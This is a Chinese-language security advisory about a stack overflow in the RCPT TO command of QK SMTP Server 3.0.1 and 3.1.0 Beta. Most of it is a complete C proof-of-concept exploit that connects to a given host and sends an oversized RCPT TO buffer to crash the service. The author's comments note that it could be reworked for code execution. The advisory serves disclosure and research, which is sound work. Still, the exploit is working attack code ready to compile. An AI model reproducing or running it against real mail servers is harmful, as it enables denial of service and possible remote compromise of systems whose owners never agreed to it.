发布日期:2006-10-23
更新日期:2006-10-25
受影响系统:
QKSoft QK SMTP 3.1.0 Beta
QKSoft QK SMTP 3.0.1
描述:
BUGTRAQ ID:
20681QK SMTP Server是一款SMTP(简单邮件传输协议)服务器软件。
QK SMTP Server在处理用户命令参数时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
QK SMTP Server在处理传送给“RCPT TO:”命令的参数时存在栈溢出漏洞,远程攻击者可以通过向服务器发送超长参数导致执行任意指令。
<*来源:Greg Linares
链接:
http://secunia.com/advisories/22563/*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
=============================================================
0-day RCPT TO DoS Exploit for QK SMTP version 3.01 and lower.
=============================================================
Exploit affects a format string error in the RCPT TO command
in which the program attempts to print out the string back
to the console screen of the application. (RCPT TO: %s)
This PoC code could possibly be re-written to allow buffer
overflow and execution of code. (I unfortanetly lack time at
the moment to continue any more reasarch and development)
EIP, EBP, ESI and EAX can be overwritten with buffer code
but the program formats it in Unicode. Results can be similar
to this:
Buffer = "A"
EIP = 00400040
EBP = 00400040
ESI = 00400040
QK SMTP 3.01 is available here:
http://www.qksoft.com/qk-smtp-server/download.htmland at various shareware download sites across the internet.
Google "FREE SMTP" and it should pop up quickly
This was quickly compiled in LCC-Win32 (Free C++ compiler and IDE)
- Greg Linares
Questions/Comments/Etc --> GLinares.code [at] gmail [dot] com
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#pragma comment(lib,"wsock32.lib")
int main(int argc, char *argv[])
{
static char overflow[65000];
static char buff2[65000];
WSADATA wsaData;
struct hostent *hp;
struct sockaddr_in sockin;
char buf[300], *check;
int sockfd, bytes;
int i;
char *hostname;
unsigned short port;
if (argc <= 1)
{
printf("QK SMTP <= 3.01 DoS RCPT TO: Overflow\n");
printf("By: Greg Linares (glinares.code [at ] gmail [dot] com)\n\n");
printf("Usage: %s [hostname] [port]\n", argv[0]);
printf("default port is 25 \n");
exit(0);
}
hostname = argv[1];
if (argv[2]) port = atoi(argv[2]);
else port = atoi("25");
if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
{
fprintf(stderr, "Error setting up with WinSock v1.1\n");
exit(-1);
}
hp = gethostbyname(hostname);
if (hp == NULL)
{
printf("ERROR: Uknown host %s\n", hostname);
printf("%s",hostname);
exit(-1);
}
sockin.sin_family = hp->h_addrtype;
sockin.sin_port = htons(port);
sockin.sin_addr = *((struct in_addr *)hp->h_addr);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
{
printf("ERROR: Socket Error\n");
exit(-1);
}
if ((connect(sockfd, (struct sockaddr *) &sockin,
sizeof(sockin))) == SOCKET_ERROR)
{
printf("ERROR: Connect Error\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("Connected to [%s] on port [%d], sending overflow....\n",
hostname, port);
if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
{
printf("ERROR: Recv Error\n");
closesocket(sockfd);
WSACleanup();
exit(1);
}
/* wait for SMTP service welcome*/
buf[bytes] = '\0';
check = strstr(buf, "2");
if (check == NULL)
{
printf("ERROR: NO response from SMTP service\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
static char Exp1[65000];
memset(Exp1, 0, 4096);
char Exp[] = "RCPT TO: ";
char tail[] = "@a.com>\r\n";
char A[] = "A";
memset(overflow, 0, 65000);
memset(buff2, 0, 100);
for (i=0; i<100; i++)
{
strcat(buff2, "A");
}
char EHLO[] = "EHLO \r\n";
char MF[] = "MAIL FROM: <HI@";
strcat(overflow, MF);
strcat(overflow, buff2);
strcat(overflow, tail);
send(sockfd, EHLO, strlen(EHLO), 0);
Sleep(500);
send(sockfd, overflow, strlen(overflow),0);
Sleep(1000);
strcat(Exp1, Exp);
for (i=0; i<4096; i++){
strcat(Exp1, A);
}
strcat(Exp1, tail);
printf("%s", Exp1);
send(sockfd, Exp1, strlen(Exp1),0);
Sleep(2000);
printf("Overflow Packet Sent Successfully...\n");
closesocket(sockfd);
WSACleanup();
}
建议:
厂商补丁:
QKSoft
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.qksoft.com/